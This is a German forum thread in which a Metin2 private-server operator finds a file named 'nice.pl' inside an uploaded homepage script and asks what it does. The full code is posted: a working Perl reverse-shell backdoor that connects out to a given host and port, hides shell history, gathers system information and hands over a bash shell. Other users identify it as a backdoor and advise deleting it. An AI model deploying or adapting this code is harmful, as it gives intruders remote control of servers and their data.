|
You last visited: Today at 03:58
Advertisement
[Q]- [KOMISCHE DATEI IN HP SCRIPT]
Discussion on [Q]- [KOMISCHE DATEI IN HP SCRIPT] within the Metin2 Private Server forum part of the Metin2 category.
10/21/2011, 02:49
|
#1
|
elite*gold: 0 
Join Date: Oct 2011
Posts: 81
Received Thanks: 3
|
[Q]- [KOMISCHE DATEI IN HP SCRIPT]
Hey Leuts,
Wollte heute mein Hp Script auf mein Webspace hochladen und habe es auch getan, vor etw. 5 Minuten wollte ich die Home Seite bearbeiten...
Dabei sah ich eine Datei namens
"nice.pl" ohne "
in dieser befand / befindet sich folgendes :
Quote:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
|
Was hat das zu bedeuten oder was macht das script ??
Ist es gefährlich oder soo  ?
|
|
|
|
10/21/2011, 02:51
|
#2
|
elite*gold: 0
Join Date: Jul 2010
Posts: 140
Received Thanks: 30
|
print "IHS BACK-CONNECT BACKDOOR\n\n"; ... denk schon xD
|
|
|
|
|
10/21/2011, 02:57
|
#3
|
elite*gold: 0
Join Date: Oct 2011
Posts: 81
Received Thanks: 3
|
Was heißt denk schon ????
Ist gefährlich und rauslöschen
oder ungefährlich
ohr what ??
WTF WAS DES  ?!
|
|
|
|
|
10/21/2011, 03:04
|
#4
|
elite*gold: 5
Join Date: Nov 2009
Posts: 1,863
Received Thanks: 2,778
|
Also ich würde die mal schnell wieder vom Webspace nehmen kenne mich ja nicht gut aus aber das sieht mehr als komisch aus und da kommt dieses nicht schöne Wort backdoor vor 
Sieht so aus als wäre es ne Lücke im Script
|
|
|
|
|
10/21/2011, 03:12
|
#5
|
elite*gold: 0
Join Date: Oct 2011
Posts: 81
Received Thanks: 3
|
okay habs mal rausgelöscht, danke für eure hilfe.
|
|
|
|
|
10/21/2011, 11:26
|
#6
|
elite*gold: 1
Join Date: Jul 2011
Posts: 473
Received Thanks: 72
|
Ist nen Perl Script,dass dem Hacker deine Root Daten sendet.
|
|
|
|
|
10/21/2011, 11:26
|
#7
|
elite*gold: 0
Join Date: Jan 2011
Posts: 2,504
Received Thanks: 870
|
ist ein bagdor zwar ein komisches aber
deleteeeeeeeeeen
|
|
|
|
|
10/21/2011, 12:51
|
#8
|
elite*gold: 439
Join Date: May 2009
Posts: 1,502
Received Thanks: 880
|
Hallo =)
Also des Script ließt Informationen übers System aus und auch Zugangsdaten..
-> andere HP verwenden!
grüßle LordMampf2
|
|
|
|
|
10/21/2011, 12:55
|
#9
|
elite*gold: 49
Join Date: Sep 2008
Posts: 906
Received Thanks: 600
|
Ihr habt ja alle so eine Ahnung,
das ist ein Root-Backdoor welcher via Netcat eine Verbindung zu einem 3. Ziel Rechner aufbaut. Über diese sogenannte Shell (Netcat) hat der Angreifer dann die Chance an sämtliche empfindliche Daten zu gelangen.
Es musst lediglich das Perl Script ausgeführt werden mit einer IP auf die er Verbinden soll mit Port.
Solange das Script nur auf dem Webspace liegt ungefährlich sobald es ausgeführt wird, sehr gefährlich.
Einfach htaccess.log durchforsten wer es ausgeführt hat und fertig.
|
|
|
|
 |
Similar Threads
|
[TuT]Datei in einer anderen Datei verstecken
05/01/2013 - Tutorials - 14 Replies
In diesem Tutorial werde ich beschreiben wie man eine beliebige Datei in einer anderen "verstecken" kann. Als Zieldatei kann dafür jede Datei jeglicher Art verwendet werden. Der 1337-Coolness zu liebe verwenden wir aber lieber Bild- , oder auch Musikdateien.
Vorerst möchte ich allerdings erklären, dass die Datei nicht wirklich "versteckt" wird sondern nur die beiden Dateien zusammengefügt werden und der Header angepasst wird. Somit ist diese Methode als "unsicher" zu bezeichnen...spassig ist...
|
Fehlermeldung, Datei existiert nicht zum packen der Season1, Datei ist aber da ...
08/10/2011 - Metin2 Private Server - 4 Replies
Hallo,
wie oben schon beschrieben hab ich die Season1 entpackt um eine neue Map
einzufügen, doch das Problem ist, wenn ich die Season1 wieder einpacken will,
dann steht in der CMD Box ein Fehler:
Bild im Anhang!
Doch die Datei exisitert, ich war in den Ordner rein, und die Datei war auch da.
|
Simpler Auto Login Script keine ExE Datei nötig!
05/16/2011 - WoW Exploits, Hacks, Tools & Macros - 16 Replies
Hallo ich hab mich mal daran gemacht einen super leichten Login Script zu schreiben wo man dan später nicht immer eine Fremde "exe" Datei ausführen muss und ein Mulmiges Gefühl bei hat sondern seine Ganz eigene sache macht :)
Also Schritt 1, es ist ganz einfach schreibt das unterhalb der zeile zunächst das in eine txt Datei.
set wshshell = createobject("wscript.shell")
WSHShell.Run """M:\World of Warcraft\Wow.exe""", 1, vbFalse
set wshshell = createobject("wscript.shell")
|
[PHP]Passwort vom PSC Script in PHP Datei verschlüsseln
05/02/2011 - Metin2 Private Server - 19 Replies
Hallöschen.
Sagt mal gibts ne möglicheit das Passwort was mit dem Cashin-Script von Sapphire auf die PSC kommt in der PHP Datei zu verschlüsseln?
Beispiel:
$psc->new_password = md5'15898298d06eef850d4610927cb1d13e';
So das er dann auch das entschlüsselte PW auf die PSC packt und nicht z.B. md5'15898298d06eef850d4610927cb1d13e'
|
[Anfrage] Script, dass nach Zeit Datei öffnet
06/16/2010 - AutoIt - 4 Replies
Hey, liebe Elite-Coders!
Ich hab eine Frage, da mir Google nicht hilft, bzw ich nicht weiß, wonach ich suchen soll/muss.
Ich möchte gerne folgendes:
Ein Script, dass immer zu einer gewissen Zeit eine Datei auf dem Desktop öffnet.
Z.B. alle 2h.
Wie kann ich das machen? Gibts da ein Tut? Einen Dos-Shell Befehl oder ähnliches?
|
All times are GMT +2. The time now is 03:58.
|
|
![[Q]- [KOMISCHE DATEI IN HP SCRIPT]](https://www.elitepvpers.com/forum/iconimages/metin2-private-server/q-komische-datei-hp-script_ltr.gif){kind=small}
